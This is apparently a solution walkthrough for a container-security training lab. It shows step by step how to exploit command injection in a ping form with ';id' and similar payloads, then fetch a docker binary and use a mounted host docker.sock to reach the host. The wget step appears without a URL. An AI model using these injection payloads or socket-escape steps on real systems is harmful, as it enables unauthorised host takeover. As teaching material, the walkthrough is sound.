Docker escape using Pod Volume Mounts to access the node and host systems - Solution

  • Navigate to the application

  • Login to the application using username: sysadmin and password: superpowers

  • Now try pinging

  • We can see that application is running the ping system command by looking at the output. Let's run some other system command by using a semicolon to separate two commands, as we know it's running in Linux system. For example, providing an input of; id would trigger ping -c 2;id in the backend.

  • Now that we have confirmed that the application is vulnerable to a command injection vulnerability. we can execute other commands and do other interesting stuff within this container.

  • Let's explore the file system and other services. Start by looking inside the custom docker container.

;ls -l /custom/docker/

  • Looks like the docker.sock is mounted from the host system as a volume mount

  • Download the docker binary to access this socket and perform docker operations within the container

;wget -O /root/docker-18.09.1.tgz

  • Now let's extract the binary to root system
;tar -xvzf /root/docker-18.09.1.tgz -C /root/

  • Now, we can gain access to the host system by running the following docker commands
;/root/docker/docker -H unix:///custom/docker/docker.sock ps

;/root/docker/docker -H unix:///custom/docker/docker.sock images